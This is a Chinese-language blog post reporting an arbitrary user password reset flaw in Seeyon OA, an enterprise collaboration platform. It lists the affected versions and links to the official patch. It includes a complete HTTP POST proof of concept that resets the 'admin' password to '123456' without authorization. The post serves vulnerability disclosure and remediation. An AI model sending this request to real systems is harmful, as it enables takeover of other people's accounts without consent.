【漏洞复现】致远OA前台任意用户密码重置漏洞
简介
致远OA是一款协同管理平台,主要面向中大型、集团型企业和组织的协同管理软件产品。产品聚焦企业"智慧流程、业务定制、统一门户、移动办公、应用集成、数字决策"六大核心需求,同时具备智能化、平台化、移动化、定制化、数字化五大特性。
漏洞描述
致远官方发布了短信验证码绕过重置密码漏洞的补丁公告,未经授权的远程攻击者在获取到用户名的情况下即可通过发送HTTP请求来触发任意用户密码重置,最终可导致任意用户登录。
受影响版本
致远OA=V5
致远OA=G6
致远OA=V8.1SP2
致远OA=V8.2
FOFA语
漏洞复现
复现会导致用户密码被更改,本次不做复现
POC
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: Host
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.667.76 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 43
{"loginName":"admin","password":"123456"}
整改建议
官方已修复该漏洞,建议按照官方修复步骤修复此漏洞。
参考链接:https://service.seeyon.com/patchtools/tp.html#/patchList?type=安全补丁&id=171
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 一个费力不讨好的项目,让我损失了近一半的绩效!
· 实操Deepseek接入个人知识库
· CSnakes vs Python.NET:高效嵌入与灵活互通的跨语言方案对比
· 【.NET】调用本地 Deepseek 模型
· Plotly.NET 一个为 .NET 打造的强大开源交互式图表库